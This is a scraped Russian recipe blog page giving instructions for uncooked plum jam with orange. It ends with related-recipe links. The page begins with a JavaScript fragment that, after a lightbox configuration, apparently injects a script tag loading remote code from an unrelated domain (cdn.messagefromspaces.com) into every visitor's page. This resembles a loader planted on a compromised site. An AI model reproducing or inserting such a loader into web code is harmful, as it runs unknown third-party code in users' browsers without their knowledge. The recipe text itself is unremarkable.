, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Вкусно + Полезно

Варенье из слив с апельсинчиком


varanjeНу кто же сейчас варит варенье! Прилавки магазинов ломятся от предложений. А я предлагаю его и не варить, а просто быстренько и вкусненько сделать.Главное в этом блюде — вкусная сезонная слива. Именно сезонная, а не голландская круглогодичная.

Что и сколько берем:

1. Вкусной сливы — 3 кг

2. Апельсины — 1-2 шт

3. Сахар  - от 2 кг

Начинаем готовить:

Итак, берем авто мясорубку и прокручиваем сливу (предусмотрительно вынув косточку) и апельсины с коркой. Хорошенько мешаем и начинаем всыпать сахар. По мере его растворения, просто досыпаем следующую порцию. Количество апельсинов и сахара каждый регулирует по вкусу. Я люблю больше апельсинов и меньше сахара. Хорошо перемешав, выкладываем в банку (лучше ее либо на пару продезинфицировать, либо в посудомойке помыть). Поскольку варенье не варим, лучше его хранить в холодильнике. Даже если оно забродит, не пугайтесь: просто проварите его тогда минуты 3-4 и ешьте с удовольствием!

 

На эту тему вы можете почитать:

Конфетки из сухофруктов
Банановый десерт
Яблочный крамбл

Тэги: ,



Добавить комментарий